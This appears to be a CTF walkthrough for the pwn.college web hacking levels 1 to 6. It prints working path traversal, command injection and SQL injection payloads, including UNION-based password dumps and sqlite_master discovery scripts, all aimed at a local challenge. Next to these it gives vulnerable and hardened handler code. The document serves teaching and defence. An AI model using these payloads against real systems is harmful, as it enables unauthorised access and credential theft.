# pwn.college Web Hacking

### Level 1

First, run the challenge from `/challenge`.

<figure><img src="/files/Gg85mzCXBXovmHznbZPI" alt=""><figcaption></figcaption></figure>

Now try path traversal through the `path` query parameter:

```
http://challenge.localhost/?path=../../flag
```

<figure><img src="/files/0jQvLx0cAyOniVEYfhyc" alt=""><figcaption></figcaption></figure>
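The level's handler is not shown on the page, so the following is an added example rather than the challenge's own code. It assumes the server serves files from a directory such as `/challenge/files` (an assumption) and joins the `path` parameter onto it. The naive join follows `../` out of that directory and, for an absolute `path`, discards the base entirely; the hardened version canonicalises the result and checks it still lies under the base, which is what stops `?path=../../flag`.

```python
import os

BASE = "/challenge/files"  # assumed directory the handler serves from


def resolve_vulnerable(base: str, requested: str) -> str:
    """What a naive handler ends up opening: os.path.join walks out of base on
    "..", and drops base altogether when `requested` is absolute."""
    return os.path.normpath(os.path.join(base, requested))


def resolve_safe(base: str, requested: str):
    """Canonicalise (resolving ".." and symlinks), then confirm the result is
    inside base. commonpath is component-aware, so "/challenge/files-evil"
    is rejected where a plain startswith() check would accept it."""
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("notes.txt", "../../flag", "/flag", "../files-evil/x"):
        print(f"{req!r:20} naive={resolve_vulnerable(BASE, req)!r:28} "
              f"checked={resolve_safe(BASE, req)!r}")
```

`resolve_safe` returns `None` for anything that escapes; a real handler would turn that into a 403/404 rather than falling through to `open()`.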

### Level 2

Exploit a command injection vulnerability

Start the challenge

<figure><img src="/files/1hB2n5UFnmDFUAq2yKpt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5WJkNmkUGwwt1awByfiD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ruodvI842HChbhnfKXwl" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/t4rRnMGKRW24PIiYHWZr" alt=""><figcaption></figcaption></figure>

The `;` ends the command the server builds, so the shell parses whatever follows it as a separate command; the trailing `;` simply closes that injected command and is optional.
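As an added example (not the challenge's code), the handler is assumed to run `ls -l <path>` through a shell, which is the shape the semicolon remark above implies. The payload `/; echo INJECTED` is constructed: `/` satisfies `ls`, `;` ends that command and a second command runs. Two fixes are shown side by side: passing argv as a list with no shell, and `shlex.quote` for the case where a shell really is unavoidable.

```python
import shlex
import subprocess

# Constructed payload: "/" keeps ls happy, ";" terminates it, then a second command runs.
PAYLOAD = "/; echo INJECTED"


def list_dir_vulnerable(path: str) -> str:
    """Assumed shape of the challenge handler: user input formatted into a shell command line."""
    result = subprocess.run(f"ls -l {path}", shell=True, capture_output=True, text=True)
    return result.stdout


def list_dir_quoted(path: str) -> str:
    """Still a shell, but shlex.quote wraps the value so the shell sees one word, ';' included."""
    result = subprocess.run(f"ls -l {shlex.quote(path)}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def list_dir_safe(path: str) -> str:
    """No shell at all: an argv list hands the value to ls as a single argument, never re-parsed."""
    result = subprocess.run(["ls", "-l", path], capture_output=True, text=True)
    return result.stdout


def injected(output: str) -> bool:
    """True if the second command in PAYLOAD actually ran."""
    return "INJECTED" in output


if __name__ == "__main__":
    for fn in (list_dir_vulnerable, list_dir_quoted, list_dir_safe):
        print(f"{fn.__name__:20} injected={injected(fn(PAYLOAD))}")
```

Only the first function prints `INJECTED`; in the other two `ls` just reports that `/; echo INJECTED` does not exist. The argv-list form is the one to prefer, since quoting is easy to get wrong when the command line is built in pieces.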

### Level 3

Exploit an authentication bypass vulnerability

<figure><img src="/files/qIAON2NR4XXH3reD25CJ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/zZ6arpZV9TkSmZJK7CBK" alt=""><figcaption></figcaption></figure>

### Level 4

Exploit a structured query language injection vulnerability to log in

<figure><img src="/files/cvMqqzcqTS2oYTI1GyAk" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/STZgCBH6s4CVOmXCR0JB" alt=""><figcaption></figcaption></figure>

Doing it with Python:

```
import requests

# 'flag" --' closes the double-quoted username literal and comments out the rest of the query
form = {"username": 'flag" --', "password": "idk"}
response = requests.post("http://challenge.localhost/", data=form)
print(response, "\n", response.text)
```

<figure><img src="/files/QujRMcoMFGg5jK44xJcm" alt=""><figcaption></figcaption></figure>
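The login query itself is only visible in the screenshots, so here is an added example (not the challenge's code) that reproduces the bypass against an in-memory SQLite database with constructed rows. It assumes the handler compares both fields inside double-quoted literals, which is what the `flag" --` payload relies on, and puts the parameterised query beside it to show the same input failing to log in.

```python
import sqlite3

FLAG = "pwn.college{constructed_flag}"  # constructed; the real level reads it from /flag


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("flag", FLAG), ("alice", "hunter2")])
    return db


def login_vulnerable(db, username: str, password: str):
    """Assumed shape of the level-4 handler: both values formatted into double-quoted literals.
    With username 'flag" --' the statement becomes
        ... WHERE username = "flag" --" AND password = "idk"
    and SQLite treats everything after -- as a comment."""
    sql = f'SELECT * FROM users WHERE username = "{username}" AND password = "{password}"'
    return db.execute(sql).fetchone()


def login_safe(db, username: str, password: str):
    """Parameterised form: the values travel separately, so quotes and -- are just data."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for fn in (login_vulnerable, login_safe):
        row = fn(db, 'flag" --', "idk")
        print(f"{fn.__name__:17} -> {row['username'] if row else None}")
```

Note that SQLite only accepts `"flag"` as a string because no column of that name exists; the double-quoted-string fallback is a legacy SQLite behaviour, which is why the challenge's double-quote style works at all.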

### Level 5

<figure><img src="/files/Vd5EBzUC2gB9skKVncy7" alt=""><figcaption></figcaption></figure>

Exploit a structured query language injection vulnerability to leak data

#### Code Breakdown

1. **Fetching the Query Parameter:**

   ```python
   query = request.args.get("query", "%")
   ```

   This line retrieves a `query` parameter from the URL's query string. If `query` is not provided, it defaults to `%`, which is a wildcard in SQL's `LIKE` clause.
2. **Executing the SQL Query:**

   ```python
   users = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()
   ```

   This line constructs a SQL query using the `query` parameter. Since it directly inserts the `query` parameter into the SQL statement, it is vulnerable to SQL injection.
3. **Returning the Results:**

   ```python
   return "".join(f'{user["username"]}\n' for user in users)
   ```

   This line formats and returns the results of the query, joining all usernames with newline characters.

#### Exploiting SQL Injection

To exploit the SQL injection vulnerability, you can manipulate the `query` parameter to include SQL commands that alter the behavior of the query. Here's how you can do it:

1. **Leak All Usernames:**

   By using the `%` wildcard in the `LIKE` clause, you can match all usernames:

   **URL:**

   ```
   http://challenge.localhost/?query=%25
   ```

   This constructs the following SQL query:

   ```sql
   SELECT username FROM users WHERE username LIKE "%"
   ```

   Since `%` matches any string, this will return all usernames in the `users` table.

To dump the passwords, close the string literal and append a `UNION`: the first `SELECT` now matches `LIKE ""` (nothing), and the second returns every password in place of a username. The `--` comments out the closing quote the server appends.

```
import requests

# Closes the LIKE literal and appends a UNION that returns every password
# as if it were a username; "--" comments out the trailing quote.
params = {"query": '" UNION SELECT password FROM users --'}

# The parameter rides in the query string (params=), which the server reads via request.args.
response = requests.post("http://challenge.localhost/", params=params)
print(response.text.strip())
```

<figure><img src="/files/5DCFNr0vgVKbEAwW1uOd" alt=""><figcaption></figcaption></figure>

### Level 6

Exploit a structured query language injection vulnerability with an unknown database structure.

<figure><img src="/files/2IQEcIHZERMOaBCzpsx1" alt=""><figcaption></figcaption></figure>

* **Table Creation:**

  ```python
  table_name = f"table{hash(flag) & 0xFFFFFFFFFFFFFFFF}"
  db.execute((f"CREATE TABLE IF NOT EXISTS {table_name} AS "
              'SELECT "flag" AS username, ? AS password'),
             (flag,))
  ```

  * The code first creates a table whose name is derived from a hash of the `flag`. Python salts `str` hashes per process, so the name changes on every start and cannot be predicted; that is what makes the database structure "unknown".
  * The table contains a single row with `"flag"` as the username and the actual flag value as the password.
* **Query Parameter Handling:**

  ```python
  query = request.args.get("query", "%")
  ```

  * The `query` parameter is retrieved from the URL's query string. If `query` is not provided, it defaults to `%`, which is a wildcard in SQL's `LIKE` clause.
* **SQL Query Execution:**

  ```python
  users = db.execute(f'SELECT username FROM {table_name} WHERE username LIKE "{query}"').fetchall()
  ```

  * This line constructs and executes a SQL query to select usernames from the dynamically named table where the username matches the `query` parameter.
* **Returning the Results:**

  ```python
  return "".join(f'{user["username"]}\n' for user in users)
  ```

  * The code joins all the retrieved usernames with newline characters and returns them as a response.

The table name is unknown, but SQLite keeps every schema object in `sqlite_master`, which the same injection can read. The first request lists the table names, the second dumps the password column of the discovered table:

```
import requests

URL = "http://challenge.localhost/"

# Step 1: read the table name from SQLite's schema table. The listing may contain
# more than one name, so pick the one following the challenge's "table<hash>" scheme.
params = {"query": '" UNION SELECT tbl_name FROM sqlite_master --'}
listing = requests.post(URL, params=params).text.split()
t_name = next(name for name in listing if name.startswith("table"))

# Step 2: dump the password column from the discovered table.
params = {"query": f'" UNION SELECT password FROM {t_name} --'}
response = requests.post(URL, params=params)
print(response.text.strip())
```

<figure><img src="/files/Fy5Xn4yIUcePESMogWg0" alt=""><figcaption></figcaption></figure>
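To make the Level 5 and Level 6 queries concrete without a running challenge, here is an added example (not the challenge's code) that rebuilds both handlers against one in-memory SQLite database with constructed rows: a `users` table with passwords (the Level 5 shape) and a table named with the page's own `table{hash(flag)}` scheme (the Level 6 shape). It runs the `%` leak, the `UNION` password dump, and the two-step `sqlite_master` discovery, and shows the same payload returning nothing once the `LIKE` value is bound as a parameter.

```python
import sqlite3

FLAG = "pwn.college{constructed_flag}"  # constructed; the real level reads /flag


class VulnerableApp:
    """Mirrors the level 5/6 handler: the query parameter is formatted straight into LIKE."""

    def __init__(self, db: sqlite3.Connection, table: str):
        self.db, self.table = db, table

    def handle(self, query: str = "%") -> str:
        rows = self.db.execute(
            f'SELECT username FROM {self.table} WHERE username LIKE "{query}"').fetchall()
        return "".join(f'{row["username"]}\n' for row in rows)


class SafeApp(VulnerableApp):
    """Same endpoint with a bound parameter: the payload is matched literally and returns nothing."""

    def handle(self, query: str = "%") -> str:
        rows = self.db.execute(
            f"SELECT username FROM {self.table} WHERE username LIKE ?", (query,)).fetchall()
        return "".join(f'{row["username"]}\n' for row in rows)


def make_apps():
    """Build the shared database and return (level5, level6, hardened level5) handlers."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    # Level 5 shape: a users table with passwords (constructed rows).
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "hunter2"), ("bob", "s3cret"), ("flag", FLAG)])
    # Level 6 shape: the page's naming scheme; str hashes are salted per process, so it varies.
    hidden = f"table{hash(FLAG) & 0xFFFFFFFFFFFFFFFF}"
    db.execute(f'CREATE TABLE {hidden} AS SELECT "flag" AS username, ? AS password', (FLAG,))
    return VulnerableApp(db, "users"), VulnerableApp(db, hidden), SafeApp(db, "users")


def leak_passwords(app: VulnerableApp) -> set:
    """Level 5: LIKE "" matches nothing, so only the UNION's password column comes back."""
    return set(app.handle('" UNION SELECT password FROM users --').split())


def dump_flag(app: VulnerableApp) -> str:
    """Level 6: discover the table name from sqlite_master, then read its password column."""
    names = app.handle('" UNION SELECT tbl_name FROM sqlite_master --').split()
    hidden = next(name for name in names if name.startswith("table"))
    return app.handle(f'" UNION SELECT password FROM {hidden} --').strip()


if __name__ == "__main__":
    level5, level6, safe = make_apps()
    print("usernames:", level5.handle("%").split())
    print("passwords:", leak_passwords(level5))
    print("flag:", dump_flag(level6))
    print("hardened:", repr(safe.handle('" UNION SELECT password FROM users --')))
```

The `UNION` result carries the first `SELECT`'s column name, which is why the passwords come back through code that only ever reads `row["username"]`; the hardened handler still lets `%` list every user, so a bound parameter fixes the injection but not the information disclosure the endpoint is designed to offer.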

